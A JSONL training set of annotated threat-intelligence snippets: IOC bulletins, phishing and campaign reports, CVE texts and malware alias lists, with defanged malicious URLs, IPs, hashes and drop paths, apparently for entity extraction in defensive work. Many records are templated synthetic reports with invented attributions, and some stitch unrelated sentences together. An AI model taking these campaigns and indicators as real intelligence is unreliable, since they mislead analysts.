sigstore/sigstore or are using an older version of Cosign. Public Sigstore deployment users are unaffected, as TUF metadata is validated by a quorum of trusted collaborators. This issue has been fixed in version 1.10.4. As a workaround, users can disable disk caching for the legacy client by setting SIGSTORE_NO_CACHE=true in the environment, migrate to hxxps://github[ . 
]com/sigstore/sigstore-go/tree/main/pkg/tuf, or upgrade to the latest sigstore/sigstore release.", "spans": {"Indicator: https://github.com/sigstore/sigstore-go/tree/main/pkg/tuf,": [[976, 1038]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-24137"}} {"text": "Artifact Analysis for Raccoon Stealer campaign:\nStage 1 dropper at /usr/local/bin/update.dll - SHA256: 17db5279b4a743ca3329249ca51ff781b4c431cd99315ceb658244eafd81d99e\nStage 2 loader at /var/tmp/implant.so - MD5: e22d329db3c4b612314db72e9de4b37e\nFinal payload at C:\\Windows\\Tasks\\payload.bin - SHA1: f18e6118efac43cfa7fd3476b4d0e5367af10849\nExfiltration module - SHA256: 23807456de6f7fa6220c0f0ac155c3545c775e332318f125bdc2e41e04407f7e\nAll stages communicated with 73 [ . ] 176 [ . ] 225 [ . ] 108. PowerShell Empire signatures detected in Stage 2.", "spans": {"Malware: Raccoon Stealer": [[22, 37]], "Indicator: 17db5279b4a743ca3329249ca51ff781b4c431cd99315ceb658244eafd81d99e": [[103, 167]], "Indicator: e22d329db3c4b612314db72e9de4b37e": [[213, 245]], "Indicator: f18e6118efac43cfa7fd3476b4d0e5367af10849": [[300, 340]], "Indicator: 23807456de6f7fa6220c0f0ac155c3545c775e332318f125bdc2e41e04407f7e": [[371, 435]], "Indicator: 73.176.225.108": [[465, 497]]}, "info": {"id": "synth_v2_01863", "source": "defanged_augment"}} {"text": "Artifact Analysis for DarkSide campaign:\nStage 1 dropper at C:\\Users\\admin\\Downloads\\helper.sh - MD5: ea1b5f3afbad94ab343ba9eaa0be235a\nStage 2 loader at /etc/cron.d/dropper.ps1 - SHA1: eaf10105057a10d9bcea0bfc26a1ef3ed2b4ea78\nFinal payload at /etc/cron.d/winlogon.exe - MD5: 4be786c4dc2cc636ff77d9a670aa8a9e\nExfiltration module - MD5: bc8146ba403fd8a74e0cf77927a62354\nAll stages communicated with 10[.]57[.]186[.]174. 
Mimikatz signatures detected in Stage 2.", "spans": {"Malware: DarkSide": [[22, 30]], "Indicator: ea1b5f3afbad94ab343ba9eaa0be235a": [[102, 134]], "Indicator: eaf10105057a10d9bcea0bfc26a1ef3ed2b4ea78": [[185, 225]], "Indicator: 4be786c4dc2cc636ff77d9a670aa8a9e": [[275, 307]], "Indicator: bc8146ba403fd8a74e0cf77927a62354": [[335, 367]], "Indicator: 10.57.186.174": [[397, 416]]}, "info": {"id": "synth_v2_01887", "source": "defanged_augment"}} {"text": "Huntress published a threat intelligence report linking Gamaredon to a new campaign exploiting CVE-2020-16717 in Apache Struts. The attackers deployed StealC via Burp Suite, establishing C2 communication with 192 [ . ] 96 [ . ] 200 [ . ] 76 and proxy-static[ . ]net. A secondary payload was downloaded from hxxp://mail-storage[ . ]org/collect. The malware binary (MD5: 9b24d6c623acf64374b974b426d0448d) was dropped to /etc/cron.d/dropper.ps1. Phishing emails were sent from security@credential-check[.]site targeting enterprise users. A backup C2 server was identified at 10 [ . ] 253 [ . ] 197 [ . ] 29.", "spans": {"Organization: Huntress": [[0, 8]], "Vulnerability: CVE-2020-16717": [[95, 109]], "System: Apache Struts": [[113, 126]], "Malware: StealC": [[151, 157]], "Indicator: 192.96.200.76": [[209, 240]], "Indicator: proxy-static.net": [[245, 265]], "Indicator: http://mail-storage.org/collect": [[307, 342]], "Indicator: 9b24d6c623acf64374b974b426d0448d": [[369, 401]], "Indicator: security@credential-check.site": [[474, 506]], "Indicator: 10.253.197.29": [[572, 603]]}, "info": {"id": "synth_v2_00103", "source": "defanged_augment"}} {"text": "r1-r4 : This is a local privilege escalation ( root ) exploit , which includes : CVE-2013-6282 , camerageroot ( http : //www[ . ]77169[ . ]org/exploits/2013/20130414031700 ) , a rooting tool for mtk6592 and addtional exploit . 
In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves . DragonOK appears to operate out of China 's Jiangsu Province .", "spans": {"Vulnerability: CVE-2013-6282": [[81, 94]], "Vulnerability: zero-day exploits": [[264, 281], [516, 533], [585, 602]], "Indicator: www.77169.org": [[121, 142]]}, "info": {"id": "cyberner_stix_train_004454", "source": "defanged_augment"}} {"text": "IOC Bulletin - Royal Campaign:\nNetwork Indicators:\n- 10 [ . ] 69 [ . ] 98 [ . ] 177\n- 10[.]42[.]105[.]94\n- 172[.]161[.]172[.]192\n- relay-update[ . ]org\n- syncupdate[ . ]site\nURLs:\n- hxxps://portal-relay[.]info/secure/token\n- hxxp://backup-backup[.]live/callback\nEmail Senders:\n- security@secure-verify[.]net\n- contact@mail-service[ . 
]info\nFile Indicators:\n- SHA256: fc62c55f7ad83e2f5b06a2cc3682f846045ded0a0f8bd5f5f4de5d4925eae59d\n- MD5: 3d3e964f0cd79892221cddf1a11bdc0a\n- Drop path: /var/tmp/backdoor.elf", "spans": {"Malware: Royal": [[15, 20]], "Indicator: 10.69.98.177": [[53, 83]], "Indicator: 10.42.105.94": [[86, 104]], "Indicator: 172.161.172.192": [[107, 128]], "Indicator: relay-update.org": [[131, 151]], "Indicator: syncupdate.site": [[154, 173]], "Indicator: hxxps://portal-relay.info/secure/token": [[182, 222]], "Indicator: http://backup-backup.live/callback": [[225, 261]], "Indicator: security@secure-verify.net": [[279, 307]], "Indicator: contact@mail-service.info": [[310, 339]], "Indicator: fc62c55f7ad83e2f5b06a2cc3682f846045ded0a0f8bd5f5f4de5d4925eae59d": [[367, 431]], "Indicator: 3d3e964f0cd79892221cddf1a11bdc0a": [[439, 471]]}, "info": {"id": "synth_v2_01458", "source": "defanged_augment"}} {"text": "IOC Bulletin - Conti Campaign:\nNetwork Indicators:\n- 219[.]86[.]211[.]83\n- 10[.]61[.]83[.]211\n- 10[.]230[.]154[.]228\n- login-cdn[.]cc\n- backupgateway[ . ]cc\nURLs:\n- hxxps://portalmail[ . ]cc/panel/index.html\n- hxxp://edge-login[ . 
]online/collect\nEmail Senders:\n- alert@login-portal[.]tech\n- service@credential-check[.]site\nFile Indicators:\n- SHA1: 0a20dfe27d403aac12a96c9771d20007e7523f32\n- SHA1: 283e083c89cab46de63576a9e3406199eec989ed\n- Drop path: /opt/app/bin/implant.so", "spans": {"Malware: Conti": [[15, 20]], "Indicator: 219.86.211.83": [[53, 72]], "Indicator: 10.61.83.211": [[75, 93]], "Indicator: 10.230.154.228": [[96, 116]], "Indicator: login-cdn.cc": [[119, 133]], "Indicator: backupgateway.cc": [[136, 156]], "Indicator: https://portalmail.cc/panel/index.html": [[165, 207]], "Indicator: hxxp://edge-login.online/collect": [[210, 246]], "Indicator: alert@login-portal.tech": [[264, 289]], "Indicator: service@credential-check.site": [[292, 323]], "Indicator: 0a20dfe27d403aac12a96c9771d20007e7523f32": [[349, 389]], "Indicator: 283e083c89cab46de63576a9e3406199eec989ed": [[398, 438]]}, "info": {"id": "synth_v2_01384", "source": "defanged_augment"}} {"text": "Malicious Instagram account : https : //www[ . ]instagram[ . ]com/freedomguidepeople1830/ Malicious Tumblr accounts : https : //mainsheetgyam[ . ]tumblr[ . ]com/ https : //hormonaljgrj[ . ]tumblr[ . ]com/ https : //globalanab[ . ]tumblr[ . ]com/ C & C addresses : 104 [ .", "spans": {"Organization: Instagram": [[10, 19]], "Organization: Tumblr": [[100, 106]], "Indicator: www.instagram.com": [[40, 65]], "Indicator: mainsheetgyam.tumblr.com": [[128, 160]], "Indicator: hormonaljgrj.tumblr.com": [[172, 203]], "Indicator: globalanab.tumblr.com": [[215, 244]]}, "info": {"id": "cyner_train_000125", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrcutorture: Fix ksoftirqd boosting timing and iteration\n\nThe RCU priority boosting can fail in two situations:\n\n1) If (nr_cpus= > maxcpus=), which means if the total number of CPUs\nis higher than those brought online at boot, then torture_onoff() may\nlater bring up CPUs that weren't online on boot. 
Now since rcutorture\ninitialization only boosts the ksoftirqds of the CPUs that have been\nset online on boot, the CPUs later set online by torture_onoff won't\nbenefit from the boost, making RCU priority boosting fail.\n\n2) The ksoftirqd kthreads are boosted after the creation of\nrcu_torture_boost() kthreads, which opens a window large enough for these\nrcu_torture_boost() kthreads to wait (despite running at FIFO priority)\nfor ksoftirqds that are still running at SCHED_NORMAL priority.\n\nThe issues can trigger for example with:\n\n\t./kvm.sh --configs TREE01 --kconfig \"CONFIG_RCU_BOOST=y\"\n\n\t[ 34.968561] rcu-torture: !!!\n\t[ 34.968627] ------------[ cut here ]------------\n\t[ 35.014054] WARNING: CPU: 4 PID: 114 at kernel/rcu/rcutorture.c:1979 rcu_torture_stats_print+0x5ad/0x610\n\t[ 35.052043] Modules linked in:\n\t[ 35.069138] CPU: 4 PID: 114 Comm: rcu_torture_sta Not tainted 5.18.0-rc1 #1\n\t[ 35.096424] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1[.]14[.]0-0-g155821a-rebuilt[.]opensuse[.]org 04/01/2014\n\t[ 35.154570] RIP: 0010:rcu_torture_stats_print+0x5ad/0x610\n\t[ 35.198527] Code: 63 1b 02 00 74 02 0f 0b 48 83 3d 35 63 1b 02 00 74 02 0f 0b 48 83 3d 21 63 1b 02 00 74 02 0f 0b 48 83 3d 0d 63 1b 02 00 74 02 <0f> 0b 83 eb 01 0f 8e ba fc ff ff 0f 0b e9 b3 fc ff f82\n\t[ 37.251049] RSP: 0000:ffffa92a0050bdf8 EFLAGS: 00010202\n\t[ 37.277320] rcu: De-offloading 8\n\t[ 37.290367] RAX: 0000000000000000 RBX: 0000000000000001 RCX: 0000000000000001\n\t[ 37.290387] RDX: 0000000000000000 RSI: 00000000ffffbfff RDI: 00000000ffffffff\n\t[ 37.290398] RBP: 000000000000007b R08: 0000000000000000 R09: c0000000ffffbfff\n\t[ 37.290407] R10: 000000000000002a R11: ffffa92a0050bc18 R12: ffffa92a0050be20\n\t[ 37.290417] R13: ffffa92a0050be78 R14: 0000000000000000 R15: 000000000001bea0\n\t[ 37.290427] FS: 0000000000000000(0000) GS:ffff96045eb00000(0000) knlGS:0000000000000000\n\t[ 37.290448] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n\t[ 37.290460] 
CR2: 0000000000000000 CR3: 000000001dc0c000 CR4: 00000000000006e0\n\t[ 37.290470] Call Trace:\n\t[ 37.295049] \n\t[ 37.295065] ? preempt_count_add+0x63/0x90\n\t[ 37.295095] ? _raw_spin_lock_irqsave+0x12/0x40\n\t[ 37.295125] ? rcu_torture_stats_print+0x610/0x610\n\t[ 37.295143] rcu_torture_stats+0x29/0x70\n\t[ 37.295160] kthread+0xe3/0x110\n\t[ 37.295176] ? kthread_complete_and_exit+0x20/0x20\n\t[ 37.295193] ret_from_fork+0x22/0x30\n\t[ 37.295218] \n\nFix this with boosting the ksoftirqds kthreads from the boosting\nhotplug callback itself and before the boosting kthreads are created.", "spans": {"Indicator: rel-1.14.0-0-g155821a-rebuilt.opensuse.org": [[1343, 1393]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1301, 1305]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-50177"}} {"text": "Phishing Campaign Report: Check Point Research identified a large-scale phishing operation. Emails originated from finance@document-share[.]link and updates@identity-verify[ . ]cc, spoofing legitimate services. Victims were directed to hxxp://secure-sync[ . ]cc/callback which hosted a credential harvesting page on datagateway[ . ]link. A secondary link hxxps://sync-secure[ . ]club/assets/js/payload.js delivered ShadowPad (SHA1: 699f3b0ef61a6ca7500802942deb399f836b4292). 
The malware was saved to /dev/shm/helper.sh and established C2 with 170[.]184[.]90[.]160.", "spans": {"Organization: Check Point Research": [[26, 46]], "Indicator: finance@document-share.link": [[115, 144]], "Indicator: updates@identity-verify.cc": [[149, 179]], "Indicator: http://secure-sync.cc/callback": [[236, 270]], "Indicator: datagateway.link": [[316, 336]], "Indicator: hxxps://sync-secure.club/assets/js/payload.js": [[355, 404]], "Malware: ShadowPad": [[415, 424]], "Indicator: 699f3b0ef61a6ca7500802942deb399f836b4292": [[432, 472]], "Indicator: 170.184.90.160": [[543, 563]]}, "info": {"id": "synth_v2_01042", "source": "defanged_augment"}} {"text": "A backdoor also known as: HW32.Packed.4904 Trojan[.]Clicker[.]Delf[.]CN Trojan[.]Clicker[.]Delf[.]CN Trojan/Clicker[.]Delf[.]cn Trojan.Win32.Delf.ifph Trojan.Adclicker TROJ_ADCLICKE.AS Trojan-Clicker[ . ]Win32[ . ]Delf[ . ]cn Trojan.CL.Delf!GHMyZMRoBZw Trojan.Win32.Clicker.197194[h] Troj[ . ]Clicker[ . ]W32[ . ]Delf[ . ]cn!c Virus.Win32.Heur.e Trojan[.]Clicker[.]Delf[.]CN Backdoor.Win32.Popwin.~IQ Trojan[ . ]Clicker[ . ]Delf[ . ]CN Trojan.Dasist Trojan.Delf.Win32.8103 TROJ_ADCLICKE.AS BehavesLike[ . ]Win32[ . ]PWSZbot[ . ]cc Trojan/Delf.ab TR/Click[ . ]Delf[ . ]CN.5 Trojan[Clicker]/Win32.Delf Trojan[.]Clicker[.]Delf[.]CN Win-Trojan/Xema.variant Trojan:Win32/Adcliker.K TrojanClicker.Delf Win32.Trojan.Delf.Lhxa Trojan[ . ]Clicker[ . ]Delf[ . ]CN Clicker.CSA", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Trojan.Clicker.Delf.CN": [[43, 71], [72, 100], [346, 374], [401, 435], [600, 628], [719, 753]], "Indicator: Clicker.Delf.cn": [[108, 127]], "Indicator: Trojan-Clicker.Win32.Delf.cn": [[185, 225]], "Indicator: Troj.Clicker.W32.Delf.cn": [[284, 324]], "Indicator: BehavesLike.Win32.PWSZbot.cc": [[490, 530]], "Indicator: Click.Delf.CN": [[549, 570]]}, "info": {"id": "cyner2_train_001027", "source": "defanged_augment"}} {"text": "220 [ . ] 158 [ . ] 216 [ . 
] 127 to gather additional Zebrocy samples as well as a weaponized document .", "spans": {"Indicator: 220.158.216.127": [[0, 33]], "Malware: Zebrocy": [[55, 62]]}, "info": {"id": "cyberner_stix_train_002217", "source": "defanged_augment"}} {"text": "FBI published a threat intelligence report linking APT28 to a new campaign exploiting CVE-2020-11739 in Zyxel USG. The attackers deployed Cobalt Strike via PsExec, establishing C2 communication with 162[.]99[.]196[.]127 and gateway-data[.]org. A secondary payload was downloaded from hxxps://cdnedge[.]xyz/gate.php. The malware binary (SHA256: ba4a5d089e1f12fa709b2ca4abec7fece16ba33979137fb58c532948202e61a4) was dropped to C:\\Windows\\Tasks\\loader.exe. Phishing emails were sent from confirm@document-share[.]link targeting enterprise users. A backup C2 server was identified at 63 [ . ] 75 [ . ] 2 [ . ] 229.", "spans": {"Organization: FBI": [[0, 3]], "Vulnerability: CVE-2020-11739": [[86, 100]], "System: Zyxel USG": [[104, 113]], "Malware: Cobalt Strike": [[138, 151]], "Indicator: 162.99.196.127": [[199, 219]], "Indicator: gateway-data.org": [[224, 242]], "Indicator: hxxps://cdnedge.xyz/gate.php": [[284, 314]], "Indicator: ba4a5d089e1f12fa709b2ca4abec7fece16ba33979137fb58c532948202e61a4": [[344, 408]], "Indicator: confirm@document-share.link": [[485, 514]], "Indicator: 63.75.2.229": [[580, 609]]}, "info": {"id": "synth_v2_00013", "source": "defanged_augment"}} {"text": "Vulnerability in the Database Filesystem component of Oracle Database Server. Supported versions that are affected are 11[.]2[.]0[.]4, 12 [ . ] 1 [ . ] 0 [ . ] 2 and 12[.]2[.]0[.]1. Easily exploitable vulnerability allows high privileged attacker having Resource, Create Table, Create View, Create Procedure, Dbfs_role privilege with network access via Oracle Net to compromise Database Filesystem. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Database Filesystem. 
CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).", "spans": {"Indicator: 11.2.0.4": [[119, 133]], "Indicator: 12.1.0.2": [[135, 161]], "Indicator: 12.2.0.1": [[166, 180]], "System: Oracle Database": [[54, 69]], "Organization: Oracle": [[353, 359]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-14741"}} {"text": "Enlarge / Top 20 countries targeted by Hummingbad/Shedun . Today , the governments of the United States , United Kingdom , Australia , Canada , New Zealand and Japan have all announced that the government of North Korea is responsible for the activities of ZINC/Lazarus . APT33 : 8 [ . ] 26 [ . ] 21 [ . ] 223 [REDACTED][ . ]ddns[ . ]net . But on Mar. 5 , 2014 , Harrison committed suicide by shooting himself in the head with a handgun .", "spans": {"Malware: Hummingbad/Shedun": [[39, 56]], "Organization: governments": [[71, 82]], "Indicator: 8.26.21.223": [[280, 309]], "Indicator: [REDACTED].ddns.net": [[310, 337]], "Organization: Harrison": [[363, 371]]}, "info": {"id": "cyberner_stix_train_007725", "source": "defanged_augment"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9989 W32/Trojan2.KJRE Infostealer.Bancos Win.Spyware.Banker-3740 Trojan.Win32.Banker.brismu Troj.Spy.W32.Delf.gmb!c Trojan.PWS.Spy.281 Trojan.Banker.Win32.115104 BehavesLike[.]Win32[.]Ramnit[.]cc W32/Trojan.FKOH-7228 TrojanSpy.Delf.efw W32.InfoStealer.Bancos Win32.Troj.Delf.kcloud Trojan/Win32.Xema.C140526 Trj/CI.A Win32.Trojan.Spy.Edyh TrojanSpy.Delf!R/OQYQsjYN8 Trojan-Spy.Win32.Bancos W32/DelpBanc.A!tr Win32/Trojan.Spy.1ee", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Ramnit.cc": [[226, 259]]}, "info": {"id": "cyner2_train_007001", "source": "defanged_augment"}} {"text": "It seems , however , if the same victim has more than one device the malware can be reused since the IMEI is sent along with each data exfiltration . 
Further research led us to additional MoonWind samples using the same C2 ( dns[ . ]webswindows[ . ]com ) but hosted on a different compromised but legitimate website . The WATERSPOUT backdoor was written to the same file path as the HIGHTIDE backdoors : C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word[ . ]exe , C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\winword[.]exe . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": {"Malware: WATERSPOUT backdoor": [[322, 341]], "Malware: HIGHTIDE backdoors": [[383, 401]], "Indicator: SETTINGS\\Temp\\word.exe": [[443, 469]], "Indicator: SETTINGS\\Temp\\winword.exe": [[511, 538]], "Indicator: dns.webswindows.com": [[225, 252]]}, "info": {"id": "cyberner_stix_train_007787", "source": "defanged_augment"}} {"text": "Blog Post by Zscaler ThreatLabz: Tracking Sandworm's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-16078 against F5 BIG-IP deployments. The initial access vector involves spear-phishing emails from it@secure-verify[.]net delivering Latrodectus. Post-compromise, the attackers deploy SystemBC and use Mimikatz for reconnaissance. C2 infrastructure includes 171 [ . ] 38 [ . ] 181 [ . ] 116 and gateway-node[.]tech. A staging server at hxxps://relay-cdn[.]tech/panel/index.html hosts additional tooling. 
Key artifact: C:\\Users\\Public\\Documents\\svchost.exe (SHA256: bb4efe2e12bf7505f7f91edadc0d27aae5e82ba1d209eba49a4f548545869d2f).", "spans": {"Organization: Zscaler ThreatLabz": [[13, 31]], "Vulnerability: CVE-2021-16078": [[130, 144]], "System: F5 BIG-IP": [[153, 162]], "Indicator: it@secure-verify.net": [[238, 260]], "Malware: Latrodectus": [[272, 283]], "Malware: SystemBC": [[323, 331]], "Indicator: 171.38.181.116": [[396, 428]], "Indicator: gateway-node.tech": [[433, 452]], "Indicator: hxxps://relay-cdn.tech/panel/index.html": [[474, 515]], "Indicator: bb4efe2e12bf7505f7f91edadc0d27aae5e82ba1d209eba49a4f548545869d2f": [[603, 667]]}, "info": {"id": "synth_v2_01687", "source": "defanged_augment"}} {"text": "Artifact Analysis for SmokeLoader campaign:\nStage 1 dropper at /var/tmp/winlogon.exe - SHA1: 4f6db7165f884312d44973e0072d5050fcbaf505\nStage 2 loader at /etc/cron.d/csrss.exe - MD5: fd7112457f6e909882ace31e6ec985c6\nFinal payload at /var/tmp/ntds.dit - SHA1: 80d42894a6606617525e69417293083428c479d2\nExfiltration module - SHA256: 9e1564490f28811b107cba26529800f7f9efa31dcfb79f09355441532ba396d4\nAll stages communicated with 163[.]229[.]191[.]196. Hashcat signatures detected in Stage 2.", "spans": {"Malware: SmokeLoader": [[22, 33]], "Indicator: 4f6db7165f884312d44973e0072d5050fcbaf505": [[93, 133]], "Indicator: fd7112457f6e909882ace31e6ec985c6": [[181, 213]], "Indicator: 80d42894a6606617525e69417293083428c479d2": [[257, 297]], "Indicator: 9e1564490f28811b107cba26529800f7f9efa31dcfb79f09355441532ba396d4": [[328, 392]], "Indicator: 163.229.191.196": [[422, 443]]}, "info": {"id": "synth_v2_01953", "source": "defanged_augment"}} {"text": "testproj[.]exe dropped benign decoy files and started malicious executables .", "spans": {"Indicator: testproj.exe": [[0, 14]]}, "info": {"id": "cyberner_stix_train_001160", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: ESET Research identified a large-scale phishing operation. 
Emails originated from account@document-share[.]link and service@account-update[ . ]xyz, spoofing legitimate services. Victims were directed to hxxps://edgecloud[.]io/panel/index.html which hosted a credential harvesting page on proxy-portal[ . ]net. A secondary link hxxps://gatewaycloud[ . ]io/download/update.exe delivered LockBit (SHA1: 9e05889736c6a9d90ec384cd3906717ec7dee7aa). The malware was saved to C:\\Users\\admin\\Desktop\\taskhost.exe and established C2 with 10 [ . ] 14 [ . ] 170 [ . ] 189.", "spans": {"Organization: ESET Research": [[26, 39]], "Indicator: account@document-share.link": [[108, 137]], "Indicator: service@account-update.xyz": [[142, 172]], "Indicator: https://edgecloud.io/panel/index.html": [[229, 268]], "Indicator: proxy-portal.net": [[314, 334]], "Indicator: hxxps://gatewaycloud.io/download/update.exe": [[353, 400]], "Malware: LockBit": [[411, 418]], "Indicator: 9e05889736c6a9d90ec384cd3906717ec7dee7aa": [[426, 466]], "Indicator: 10.14.170.189": [[554, 585]]}, "info": {"id": "synth_v2_01021", "source": "defanged_augment"}} {"text": "Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4[.]19[.]9[.]98 .", "spans": {"Malware: Carbanak": [[11, 19]], "Organization: banks": [[79, 84]], "Organization: payment systems": [[91, 106]], "Indicator: Cyberlink": [[158, 167]], "Indicator: 4.19.9.98": [[253, 268]]}, "info": {"id": "cyberner_stix_train_000295", "source": "defanged_augment"}} {"text": "IOC Bulletin - RedLine Stealer Campaign:\nNetwork Indicators:\n- 202[.]150[.]67[.]92\n- 172[.]242[.]252[.]126\n- 65 [ . ] 146 [ . ] 140 [ . ] 145\n- synccache[ . ]xyz\n- backup-gateway[ . ]info\nURLs:\n- hxxp://updateportal[ . ]cc/callback\n- hxxp://edgegateway[ . 
]org/secure/token\nEmail Senders:\n- it@login-portal[.]tech\n- verify@credential-check[.]site\nFile Indicators:\n- SHA256: 0a4aa16f727d7fa4c357f6ed7230738c723cae0bbfb91fa895f878e768cbdf40\n- SHA256: 308615cb4494e967db13a67299fe83f77b8a6dc4aa54c56b8d1d4f2d34155676\n- Drop path: /var/tmp/dropper.ps1", "spans": {"Malware: RedLine Stealer": [[15, 30]], "Indicator: 202.150.67.92": [[63, 82]], "Indicator: 172.242.252.126": [[85, 106]], "Indicator: 65.146.140.145": [[109, 141]], "Indicator: synccache.xyz": [[144, 161]], "Indicator: backup-gateway.info": [[164, 187]], "Indicator: hxxp://updateportal.cc/callback": [[196, 231]], "Indicator: http://edgegateway.org/secure/token": [[234, 273]], "Indicator: it@login-portal.tech": [[291, 313]], "Indicator: verify@credential-check.site": [[316, 346]], "Indicator: 0a4aa16f727d7fa4c357f6ed7230738c723cae0bbfb91fa895f878e768cbdf40": [[374, 438]], "Indicator: 308615cb4494e967db13a67299fe83f77b8a6dc4aa54c56b8d1d4f2d34155676": [[449, 513]]}, "info": {"id": "synth_v2_01403", "source": "defanged_augment"}} {"text": "This indicates that multiple C2 servers were used in this campaign , but one ( 37 [ . ] 1 [ . ] 207 [ . ] 31 ) was the most heavily used . A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation . 
The malware is executed only for the following layout , the country is based on the Microsoft website : Cyberattacks can leave companies wondering how could this happen to us so , when these situations arise , it can help to know what might be motivating these attackers .", "spans": {"Organization: Microsoft": [[404, 413]], "Indicator: 37.1.207.31": [[79, 108]]}, "info": {"id": "cyberner_stix_train_002943", "source": "defanged_augment"}} {"text": "We saw the following hardcoded C & C server location in the RAT package : Conclusion : The DroidJack RAT is another example of a growing trend in which malware authors seek to exploit public interest as a way to spread malware . The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . 1[.]doc : 832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8 . Mandiant is not aware of any configuration change that can be made to force request logging for these endpoints .", "spans": {"Malware: DroidJack RAT": [[91, 104]], "Organization: financial services": [[310, 328]], "Organization: telecoms": [[331, 339]], "Organization: government": [[342, 352]], "Organization: defense sectors": [[359, 374]], "Indicator: 1.doc": [[377, 384]], "Indicator: 832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8": [[387, 451]], "Organization: Mandiant": [[454, 462]]}, "info": {"id": "cyberner_stix_train_003065", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Huntress identified a large-scale phishing operation. Emails originated from admin@auth-check[ . ]org and admin@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxp://proxygateway[ . ]info/gate.php which hosted a credential harvesting page on storageauth[.]org. A secondary link hxxp://authstorage[.]online/panel/index.html delivered WarmCookie (SHA256: 6e2042e8e9c59ffc5b2fc6f8406432cf7d527458df6bcc7d7012e57ba90167e8). 
The malware was saved to C:\\Windows\\Tasks\\beacon.dll and established C2 with 207[.]50[.]68[.]60.", "spans": {"Organization: Huntress": [[26, 34]], "Indicator: admin@auth-check.org": [[103, 127]], "Indicator: admin@secure-verify.net": [[132, 159]], "Indicator: hxxp://proxygateway.info/gate.php": [[216, 253]], "Indicator: storageauth.org": [[299, 316]], "Indicator: hxxp://authstorage.online/panel/index.html": [[335, 379]], "Malware: WarmCookie": [[390, 400]], "Indicator: 6e2042e8e9c59ffc5b2fc6f8406432cf7d527458df6bcc7d7012e57ba90167e8": [[410, 474]], "Indicator: 207.50.68.60": [[554, 572]]}, "info": {"id": "synth_v2_00933", "source": "defanged_augment"}} {"text": "Blog Post by Trend Micro: Tracking BlackTech's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2024-27359 against Atlassian Confluence deployments. The initial access vector involves spear-phishing emails from verify@secure-verify[ . ]net delivering Conti. Post-compromise, the attackers deploy PlugX and use PsExec for reconnaissance. C2 infrastructure includes 73[.]16[.]165[.]187 and cache-data[.]info. A staging server at hxxp://securebackup[.]site/admin/config hosts additional tooling. 
Key artifact: C:\\Windows\\System32\\runtime.dll (SHA1: 0b462a466b69be91392bd2f0a7caa06e5145bb13).", "spans": {"Organization: Trend Micro": [[13, 24]], "Vulnerability: CVE-2024-27359": [[124, 138]], "System: Atlassian Confluence": [[147, 167]], "Indicator: verify@secure-verify.net": [[243, 271]], "Malware: Conti": [[283, 288]], "Malware: PlugX": [[328, 333]], "Indicator: 73.16.165.187": [[396, 415]], "Indicator: cache-data.info": [[420, 437]], "Indicator: hxxp://securebackup.site/admin/config": [[459, 498]], "Indicator: 0b462a466b69be91392bd2f0a7caa06e5145bb13": [[578, 618]]}, "info": {"id": "synth_v2_01543", "source": "defanged_augment"}} {"text": "Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com[ . ]mxi[ . ]videoplay ) .", "spans": {"Malware: Ploutus": [[55, 62]], "Indicator: MXI Player": [[220, 230]], "Indicator: com.mxi.videoplay": [[360, 385]]}, "info": {"id": "cyberner_stix_train_004633", "source": "defanged_augment"}} {"text": "Despite the FBI takedown in August 2023, QakBot (also known as Qbot and Pinkslipbot) resurfaced in late 2024 with updated infrastructure. The new variant with SHA256 hash 8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b communicates with C2 servers at 203[.]0[.]113[.]42, 198[.]51[.]100[.]73, and 192 [ . ] 0 [ . ] 2 [ . ] 156. The malware is delivered through malicious OneNote files that execute PowerShell commands to download the payload from hxxp://203[.]0[.]113[.]42/updates/kb5034441.dll. QakBot creates persistence via a scheduled task and drops its main DLL to C:\\Users\\AppData\\Roaming\\Microsoft\\{GUID}\\qbot.dll. The malware performs process injection into wermgr.exe and explorer.exe for evasion. 
